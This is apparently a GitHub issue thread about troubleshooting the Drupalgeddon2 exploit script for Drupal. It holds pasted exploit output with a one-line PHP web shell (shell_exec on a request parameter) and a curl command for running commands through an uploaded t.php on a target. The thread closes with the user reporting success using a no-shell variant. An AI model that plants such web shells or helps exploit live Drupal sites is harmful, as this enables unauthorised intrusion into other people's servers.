### ISSUE TITLE
error

### ISSUE THREAD

**Issue by beeprime** [dreadlocked/Drupalgeddon2#12]
drupalgeddon2.rb:147:in `<main>': undefined method `strip' for nil:NilClass (NoMethodError)

**Comment by g0tmi1k** [comment]
@beeprime Should be fixed in #13.

Please could you update and try again?

**Comment by beeprime** [comment]
Now this comes

/usr/lib/ruby/vendor_ruby/json/common.rb:156:in `parse': 765: unexpected token at '<!DOCTYPE html> (JSON::ParserError)

**Comment by g0tmi1k** [comment]
Thanks! Will look into it!

**Comment by beeprime** [comment]
And also in the cases of success it can't upload .php where as gives back the prompt stating the php code and the page response as data.
In short no code execution happens.

[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[*] Fake shell:   curl 'http://x.x.x.x/t.php' -d 'c=whoami'
<?php echo shell_exec($_GET['c'].' 2>&1'); ?>> 
<?php echo shell_exec($_GET['c'].' 2>&1'); ?>> 
<?php echo shell_exec($_GET['c'].' 2>&1'); ?>> dir
<!DOCTYPE html>

<html>

<head>
  <meta charset="utf-8" />
<link rel="shortcut icon" href="http://x.x.x.x/sites/default/files/favicon.ico" type="image/vnd.microsoft.icon" />


N.B:- changed the webshell code also, which have been reflected above. Otherwise default webshell code has been reflected in it's place.

**Comment by dreadlocked** [comment]
Please, test with drupalgeddon-not-write-shell.rb which does not require any shell to work on Drupal 7.

**Comment by beeprime** [comment]
Its success. Thanks a ton.

Super LIke
